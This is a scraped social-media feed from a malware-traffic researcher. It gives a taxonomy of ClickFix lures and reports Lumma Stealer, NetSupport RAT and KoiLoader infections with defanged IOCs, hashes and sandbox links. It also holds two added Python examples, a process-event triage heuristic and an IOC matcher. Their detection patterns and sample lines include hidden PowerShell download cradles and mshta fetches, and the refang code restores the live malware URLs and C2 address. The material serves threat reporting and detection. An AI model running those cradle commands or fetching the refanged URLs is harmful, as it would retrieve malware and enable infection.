Brad

@malware_traffic@infosec.exchange
3.4K Followers
45 Following
71 Posts
Sharing information on malicious network traffic and malware samples.
Website: https://www.malware-traffic-analysis.net/

#Example 3: #TermFix

I rarely see this, and I haven't yet personally documented it. So I found an image from a Google search to illustrate.

This example is from a #TermFix style #ClickFix popup asking the viewer to open a PowerShell terminal.

Example 2: #FileFix

As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.

It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.

Example 1: #RunFix

As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT

#ClickFix is a social engineering technique that uses fake verification pages and clipboard hijacking to convince people to click and keyboard stroke their way to an infection. So let's categorize #FileFix properly in the pantheon of ClickFix Attacks.

FileFix: A ClickFix page that asks you to paste script into a File Manager window.

#RunFix: A ClickFix page that asks you to paste script into a Run window

#TermFix: A ClickFix page that asks you to paste script into a terminal window (cmd.exe console or PowerShell terminal).

We cool with that? Any other types I'm missing?
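The three variants above differ only in which window the victim pastes into, so from a process-creation event the Run box and the File Explorer address bar look the same (both spawn from explorer.exe), while a paste into an open console shows a console parent. The following is an added example for this thread, not Brad's code: a small triage heuristic over Sysmon Event ID 1 style fields (ParentImage, Image, CommandLine). The interpreter list, the cradle markers and the sample events are all assumptions constructed for illustration, not telemetry from any of the posts.

```python
"""Triage process-creation events for ClickFix-style execution chains.

Added example, not Brad's code. Assumes Sysmon Event ID 1 style fields
(ParentImage, Image, CommandLine) already parsed into dicts. The sample
events below are constructed for illustration, not taken from any post.
"""
import re
from typing import Optional

# Interpreters a ClickFix lure typically tells the victim to launch.
# Assumption: a starting point, not an exhaustive list.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe"}

# Command-line markers of a download-and-run cradle.
# Assumption: common PowerShell aliases/switches; tune to your environment.
CRADLE_MARKERS = [
    r"\biwr\b", r"\birm\b", r"\biex\b",
    r"invoke-webrequest", r"invoke-expression", r"downloadstring",
    r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
    r"-w(indowstyle)?\s+hidden",
    r"mshta(\.exe)?\s+https?://",
    r"\bcurl(\.exe)?\b.*\bhttps?://",
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def classify(event: dict) -> Optional[dict]:
    """Return a finding dict, or None if the event does not look like ClickFix.

    Variant mapping follows the taxonomy in the thread:
      explorer.exe parent -> RunFix or FileFix (the Run box and the File
                             Explorer address bar both spawn from explorer.exe,
                             so the two are not separable from this event alone)
      console parent      -> TermFix (pasted into an open cmd/PowerShell)
    """
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image not in INTERPRETERS:
        return None
    hits = [m for m in CRADLE_MARKERS if re.search(m, cmd, re.IGNORECASE)]
    if not hits:
        return None
    if parent == "explorer.exe":
        variant = "RunFix/FileFix"
    elif parent in {"cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}:
        variant = "TermFix"
    else:
        variant = "unknown-parent"
    return {"variant": variant, "image": image, "parent": parent, "markers": hits}


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # Run box: explorer.exe spawns a hidden PowerShell download cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/x.zip -o x.zip"',
    },
    {   # Terminal: victim pasted an mshta one-liner into an already open cmd.exe
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/a.hta",
    },
    {   # Benign: scheduled admin script, no cradle markers
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -File C:\\scripts\\cleanup.ps1",
    },
]


def triage(events: list) -> list:
    """Run classify() over a batch and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

One caveat a practitioner should keep in mind: a TermFix paste of a pure PowerShell cradle (`iwr ... | iex`) runs inside the existing powershell.exe and creates no new process, so it only shows up in script block logging (Event ID 4104), not in process-creation telemetry; the heuristic above catches the case where the pasted command spawns a child interpreter.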

2025-07-02 (Wednesday): Another #LummaStealer infection with follow-up #Rsockstun #malware.

The #Lumma Stealer infection uses a password-protected 7-zip archive, a NullSoft installer, and #AutoItv3.

Malware samples, a #pcap and some IOCs are available at https://www.malware-traffic-analysis.net/2025/07/02/index.html

2025-06-27 (Friday): I ran another #LummaStealer infection today. It was basically the same as yesterday, except for the follow-up malware.

I saw the same URL for hxxp[:]//86.54.25[.]40/sok.exe, but it returned a different file.

It generated the same type of C2 traffic over TCP port 16443, but it used a different domain for the C2 server at eset-blacklist[.]net.

Sample:

- https://bazaar.abuse.ch/sample/9dc1872510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/

Sandbox analysis:

- https://www.joesandbox.com/analysis/1724473

- https://tria.ge/250627-26apgask14

- https://app.any.run/tasks/651d4998-807d-4ac2-821b-88061c288013

2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT

URL sequence leading to ClickFix:

- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa

URL sequence after running ClickFix script:

- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928

SHA256 hash for smks.zip archive containing NetSupport RAT package:

3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5

NetSupportRAT C2: 185.163.45[.]30:443

cc: @monitorsg
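The 2025-06-27 posts above (the Lumma Stealer follow-up and the SmartApeSG chain) publish their indicators defanged (hxxp, [.], [:]), which is the right way to share them but the wrong form to feed into tooling. The following is an added example, not Brad's code: it refangs the indicators exactly as they appear in those two posts, sorts them into hosts, URLs, ip:port sockets and hashes, and matches them against proxy/flow log lines. The log format and the log lines themselves are constructed assumptions for illustration; the indicator strings are copied from the posts.

```python
"""Refang the indicators from the 2025-06-27 posts and match them against
proxy/flow log lines.

Added example, not Brad's code. The IOC strings are copied verbatim from the
posts; the log format and log lines are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Indicators as published in the two 2025-06-27 posts (defanged).
RAW_IOCS = [
    "hxxp[:]//86.54.25[.]40/sok.exe",
    "eset-blacklist[.]net",
    "palcomp3[.]top/sss/buf.js",
    "palcomp3[.]top/sss/index.php?GQX1KqUM",
    "palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa",
    "camplively[.]com/all.php",
    "camplively[.]com/smks.zip?lap=3928",
    "185.163.45[.]30:443",
    "3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5",
]


def refang(ioc: str) -> str:
    """Undo common defanging: hxxp -> http, [.] -> ., [:] -> :."""
    s = ioc.strip()
    s = re.sub(r"^hxxps?", lambda m: m.group(0).replace("xx", "tt"), s,
               flags=re.IGNORECASE)
    return s.replace("[.]", ".").replace("[:]", ":").replace("(.)", ".")


def _url_key(url: str) -> str:
    """host + path + ?query, without scheme, for exact-URL matching."""
    p = urlsplit(url)
    return (p.hostname or "") + p.path + ("?" + p.query if p.query else "")


def load_indicators(raw: list) -> dict:
    """Refang and bucket indicators into hosts, urls, sockets and sha256."""
    ind = {"hosts": set(), "urls": set(), "sockets": set(), "sha256": set()}
    for r in raw:
        s = refang(r)
        if re.fullmatch(r"[0-9a-f]{64}", s, re.IGNORECASE):
            ind["sha256"].add(s.lower())
            continue
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}:\d+", s):
            ind["sockets"].add(s)
            continue
        url = s if "://" in s else "http://" + s   # bare host/path entries
        p = urlsplit(url)
        ind["hosts"].add(p.hostname)
        if p.path not in ("", "/") or p.query:    # a real URL, not just a host
            ind["urls"].add(_url_key(url))
    return ind


# Constructed log lines: "<ts> <client> <GET|TCP> <url|ip:port> [status]".
# Assumption: a simplified proxy/flow format, not from any real sensor.
LOG_LINES = [
    "2025-06-27T14:02:11Z 10.0.0.5 GET http://palcomp3.top/sss/buf.js 200",
    "2025-06-27T14:02:12Z 10.0.0.5 GET https://www.malware-traffic-analysis.net/ 200",
    "2025-06-27T14:03:40Z 10.0.0.5 GET http://camplively.com/smks.zip?lap=3928 200",
    "2025-06-27T14:04:02Z 10.0.0.5 TCP 185.163.45.30:443",
    "2025-06-27T14:05:00Z 10.0.0.7 TCP 203.0.113.9:443",
    "2025-06-27T14:06:30Z 10.0.0.9 GET http://palcomp3.top/other.html 404",
]


def match_line(line: str, ind: dict) -> list:
    """Return the indicator hits for one log line (empty list if clean)."""
    _ts, _client, kind, target, *_rest = line.split()
    hits = []
    if kind == "TCP":
        if target in ind["sockets"]:
            hits.append("socket:" + target)
        host = target.rsplit(":", 1)[0]
        if host in ind["hosts"]:
            hits.append("host:" + host)
    else:
        key = _url_key(target)
        host = urlsplit(target).hostname
        if key in ind["urls"]:
            hits.append("url:" + key)
        elif host in ind["hosts"]:       # same host, different path: still worth a look
            hits.append("host:" + host)
    return hits


def scan(lines: list, ind: dict) -> list:
    """Return (line, hits) pairs for every line that touched an indicator."""
    out = []
    for line in lines:
        hits = match_line(line, ind)
        if hits:
            out.append((line, hits))
    return out


if __name__ == "__main__":
    for line, hits in scan(LOG_LINES, load_indicators(RAW_IOCS)):
        print(hits, "<-", line)
```

The host-level fallback matters for the Lumma case in particular: the post notes the same sok.exe URL returned a different file on 06-27 than on 06-26, and that the C2 domain changed while the port (TCP 16443) stayed the same, so matching only on exact URLs or exact sockets would miss the next iteration; matching on the host catches any path on palcomp3[.]top or camplively[.]com, and the port is something to pivot on separately in flow data.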

2025-06-26 (Thursday): #LummaStealer infection leads to follow-up loader that retrieves a pen test tool hosted on Github and configures it as #malware.

A #pcap of the infection traffic, the associated malware, and IOCs are available at: https://www.malware-traffic-analysis.net/2025/06/26/index.html

#Lumma

2025-06-21 (Saturday): #KoiLoader / #KoiStealer infection.

A #pcap of the infection traffic, associated malware/files, and some of the indicators are available at https://www.malware-traffic-analysis.net/2025/06/21/index.html

2025-06-20 (Friday): From a post I wrote for my employer on other social media about distribution of #malware disguised as cracked software.

The malware is contained in password-protected 7-Zip archives to avoid detection.

A #pcap from running the malware, and the associated malware files are available at https://www.malware-traffic-analysis.net/2025/06/20/index.html

I don't know what this malware is, so if anyone knows, feel free to reply. I'm just here for the memes.

@malware_traffic thx, sure enough! missed this and a few others.